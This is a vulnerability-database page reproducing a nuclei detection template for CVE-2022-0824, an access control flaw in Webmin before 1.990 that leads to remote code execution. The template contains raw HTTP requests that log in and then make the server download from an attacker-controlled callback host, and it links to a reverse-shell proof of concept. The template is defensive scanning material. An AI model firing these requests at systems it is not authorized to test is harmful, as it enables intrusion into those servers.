Lucene search
K

Webmin <1.990 - Improper Access Control

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 101 Views

Webmin <1.990 - Improper Access Control, CVE-2022-082

Related
Refs
Code
id: CVE-2022-0824

info:
  name: Webmin <1.990 - Improper Access Control
  author: cckuailong
  severity: high
  description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade Webmin to version 1.990 or later to mitigate this vulnerability.
  reference:
    - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
    - https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
    - https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0824
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0824
    cwe-id: CWE-284,CWE-863
    epss-score: 0.96977
    epss-percentile: 0.99882
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: webmin
    product: webmin
    shodan-query: http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2022,rce,oss,huntr,webmin,authenticated,vuln

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: redirect=1;testing=1;PHPSESSID=;

        user={{username}}&pass={{password}}
      - |
        POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/filemin/?xnavigation=1

        link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "Failed to write to /{{ranstr}}/index.html"
# digest: 490a0046304402204ff9ae982b49d6329d698b63e2e087b3551d06782b861f0cc9f7276bdd6ad94e0220224c4da74b56bc9684d8806bac74ae08a57f122741a8793d5b18f892b38beda1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.18.8
CVSS 29
CVSS 38.3
EPSS0.96977
101